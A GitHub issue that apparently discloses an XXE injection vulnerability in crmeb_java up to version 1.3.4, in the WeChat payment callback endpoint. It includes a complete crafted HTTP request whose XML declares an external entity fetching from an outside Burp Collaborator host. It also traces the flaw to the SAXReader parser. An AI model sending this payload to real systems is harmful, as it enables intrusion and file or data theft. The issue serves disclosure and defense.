Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a XXE injection vulnerability in the crmeb_java system /api/admin/payment/callback/wechat #15

Open
Tyaoo opened this issue Mar 16, 2023 · 0 comments

Comments

@Tyaoo
Copy link

Tyaoo commented Mar 16, 2023

[Suggested description]
There is a XXE Injection vulnerability in crmeb_java <=1.3.4, which is triggered by the SaxReader component.

[Vulnerability Type]
XML External Entity (XXE) Injection

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]
/api/admin/payment/callback/wechat

[Attack Type]
Remote

[Vulnerability details]
Send the crafted request package to the api interface /api/admin/payment/callback/wechat

POST /api/admin/payment/callback/wechat HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-zation: dbdd777e27b94979adf06fc3fd20ee68
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Content-Type: application/xml
Content-Length: 239

<?xml version="1.0"?>
<!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "http://3qurglf920zqknzhgryal9ip7gd61v.burpcollaborator.net/evil.xml" >]>
<return_code>&xxe;</return_code>
<return_msg><![CDATA[OK]]></return_msg>

image

[Impact Code execution]
true

[Cause of vulnerability]
The interface /api/admin/payment/callback/wechat calls the function weChat
image
If the xmlInfo is not blank, the function processResponseXml will be called.
image
Then it calls the function xmlToMap to process the xml.
image
There is a XXE Injection vulnerability with the SAXReader component.
image

That's all, thanks.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant